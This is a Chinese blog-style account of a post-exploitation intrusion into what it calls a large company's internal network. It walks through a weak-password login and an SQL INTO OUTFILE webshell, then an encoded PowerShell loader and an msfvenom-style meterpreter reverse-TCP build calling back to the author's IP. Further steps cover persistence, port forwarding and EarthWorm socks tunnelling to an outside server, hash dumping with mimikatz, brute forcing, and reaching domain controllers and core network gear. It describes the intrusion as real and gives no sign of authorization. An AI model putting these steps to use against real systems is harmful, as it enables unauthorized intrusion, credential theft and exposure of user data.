针对某大厂的后渗透实战记录

此文将全部脱敏，涉及某大厂商，中间会穿插一些小的知识点与细节。0x01 信息搜集 - 后渗透首先我们后渗透阶段的开始表现在拥有一个 Webshell 或者通过其他漏洞获取了某些操作服务器文件的权限，亦或者能够直接反弹 Shell这里我挑选了一个某厂边缘处的一个测试环境，在这之前我做了大量的信息搜集，没有选择直接去挖掘、利用漏洞1、操作系统2、Web服务器版本3、PHP版本4、绝对路径5、子域名6、开放端口 - 发现开启了防火墙扫描到它存在，弱口令登录进入，通过常规手法 SQL 写入 shell。SELECT '' INTO OUTFILE 'D:/WWW/***/master/';通过 Webshell 的方式进入，肯定是要直接看权限了，但是由于是他们的测试环境，权限相对比较高。

通过上面的结果可以看到该服务器并不是域成员

没有管理员在线

可以发现有 3389 端口，我尝试了去直接连接，但是被拒绝了，绝对是防火墙做了入站限制这个尝试是有风险的，因为你不知道下一步的操作能够为自己带来怎样的走向再查看一下网卡：

这个内网地址我就不脱敏了，方便读者阅读后面的操作0x02 后渗透的开始

网络拓扑图如下：

首先我要生成一个 MSF 木马，目标由于是 Win 2008 支持，可以直接一句话搞定 :)这里我是进行了一个端口转发，将公司路由的 1131 映射到本机的 1131MSF 这边监听 1131：

ps1encode 项目：https://github.com/CroweCybersecurity/ps1encode将要执行的 powershell 命令经过上面的工具编码之后，使用下面的命令执行，可以执行我们的 powershell 命令powershell -nop -win Hidden -noni -enc JAAxACAAPQAgACcAJABjACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQ但是期望越大失望越大，目标主机提示语法错误，难道是 webshell 传输字符串太长有丢失？我尝试了使用 cmd 批处理脚本启动，vbs 脚本启动，一样无果。决定不采用 powershell 了，采用 exe./ps1encode.rb -i [我的公网IP] -p 1131 -a windows/x64/meterpreter/reverse_tcp -t exe执行过程中有时候会出现这类情况：

很明显是生成的木马与操作系统不兼容；更改为：./ps1encode.rb -i...-p 1131 -a windows/x64/meterpreter/reverse_tcp --32bitexe -t exe使用 WebShell 执行后：

权限维持

0x03 关于权限维持的思考persistence 模块

优先介绍这个模块它用于创建一个反向连接的后门，使被控端主动连接控制端，传统又好用，但是会留下文件参数介绍：

metsvc

它是一个正向的连接，不适用于复杂的内网环境0x04 端口转发之portfwd详解

可以看出服务器开启了 3389，假设我如果需要连接 3389 该怎么办呢？ - (刚才提到了，有防火墙的限制)使用:

下面来练习一下（正向转发）目的：将内网某台主机的 3389 转发到本地portfwd add -L 0.0.0.0 -l 1144 -p 3389 -r 10.159.63.178此时连接本机的 1144 就相当于连接目的：将内网某台主机端口流量转发到某台外网主机 (可做端口劫持)portfwd add -R -l 8080 -p 1478 -L 10.159.191.2此时访问的 1478 端口就相当于访问的 8080 端口portfwd delete -i 1删除条目为 1 的端口转发portfwd list列出端口转发条目portfwd flush清空所有转发端口扫描添加路由表:

当然在上线前，你就设置好自动添加路由，就不需要去手动添加了：

但是它也有弊端，就是子网太大了，可能会将我们的数据包广播出去，所以最好记一下子网大小，手动灵活添加路由~扫描

0x05 Meterpreter获取 Hash 的几个方式run hashdump

run powerdump

load mimikatz kerberos

run post/windows/gather/smart_hashdump

0x06 PowerShell技巧外部 Powershell 脚本 - Powersploithttps://github.com/PowerShellMafia/PowerSploit第一种办法（推荐）：

第二种办法：(先通过其他模块下载)

0x07 再一次克服困难之前的方案是使用，但是效果太差了，当数据流过大，会将 Meterpreter 冲掉，并且每次数据回送都不完整。这次采用 Socks5 打洞，我利用了外网的服务器，开设一个 Socks 代理端口，将流量转发到目标内网外网服务器：root@iZm5e***1ga7bq07Z:~# ./ew_for_linux64 -s rcsocks -l 1080 -e 888 &内网主机：ew_for_Win.exe -s rssocks -d [服务器IP] -e 888ew 下载地址：http://rootkiter.com/EarthWorm/现在在浏览器中设置一下 Socks5 代理即可访问内网，很稳定

0x08 开始扫描一开始我使用 PowerSploit 扫描，但是需要等待 Meterpreter 将数据取回，这样就占用了一个 session，搜集了部分信息后，决定采用 Nmap由于我的操作系统是黑苹果，需要安装brew install proxychains-ng程序安装在：配置文件：添加一条Socks5代理：

开始扫描：

0x09 信息搜集基本结果通过端口扫描以及 HTTP 服务的爬行，发现一些运维人员开放的共享，和一些 MS17010 漏洞的 Windows 服务器，但是没有选择直接去打，觉得信息搜集的不够全面在内网中收获最大的就是搜集到了运维人员用于共享系统镜像、工具的 Web 服务器：

发现基线检查的文档，下载了一两个，开始通过搜集的信息进行内网结构画像：

轻松获得域控服务器

从文档中搜集信息如下：

根据之前搜集的子网来判断，我们所处于的内网中有很多域。并且能够可以和域控服务器通信，即使当前的服务器不在域中，也可以进行登录

通过两层转发，我们尝试登录：1、一层是公司路由2、一层是LCX

当时登录上去并没有做过多的操作，简单看看就下来了，因为这个内网很大，后面的发现令我倒吸凉气0x10 内网核心Orion这是一款完善的网络带宽、性能和故障管理软件。使用它用户可以通过自己的浏览器即时监控自己的网络状态和统计资料。程序将监视和搜集来自路由、节点、服务器和所有开启 SNMP 服务的设备信息；同时也将监控本机的 CPU 占用率、内存使用情况以及可用磁盘空间。

通过空口令进入

通过查看别名发现这些设备是企业的核心路由、防火墙、交换机1、官网防火墙2、管理员交换机（专线）3、内网核心交换机 x 24、外网核心交换机 x 25、公网接入交换机 x 26、回源 （这个不太清楚）基本上都是 50 个口以上通过之前的自动搜集的路由来看：

是可以访问整个超大的内网，在搜集其他网段信息的时候，不泛发现其他大企业的漏洞、大多是配置不得当。0x12 配置引发的隐患

还有未做权限验证的 Docker 集群管理平台：

有多个实例，分别用于对外的服务搜集到用户中心的数据库配置，也就是说泄漏了所有用户的数据了，这可是一个大厂。

其次一些网段基本上都安装了，通过 socks5 代理，进行爆破，流量不走 Meterpreter，因为会掉线

如我所料，没有一个成功的，也发现了一些 SSH 端口，但是会把流量升高，触发一些警报，就没有再尝试这种爆破手法了。0x13 需要搜集的信息搜集的信息列出来，就不贴了：1、服务器当前所在网段的所有主机端口2、服务器ARP缓存3、服务器上的服务4、内网中其他 HTTP 服务5、满足容易利用的漏洞端口 （MS17010 / 445）6、抓包嗅探还是很有必要的 （千万不要 ARP %@#@@651#@^#@@#@@###@@!）7、共享文件8、密码0x14 总结1、在行动之前思考几分钟，有没有更好的办法2、思考一个问题多个解决方案的利弊3、尽量快速熟悉网络环境 -> [前提是你已经熟悉了服务器环境]4、对日志要时刻保持敏感5、看子网掩码、计算子网大小，判断有没有 VLAN6、选取自己熟悉的协议进行信息搜集7、网络命令一定要熟8、对于后门要加强维护9、你必须保证你花费 98% 的时间都在了解他们10、学习使用 Powershell 和熟练掌握端口转发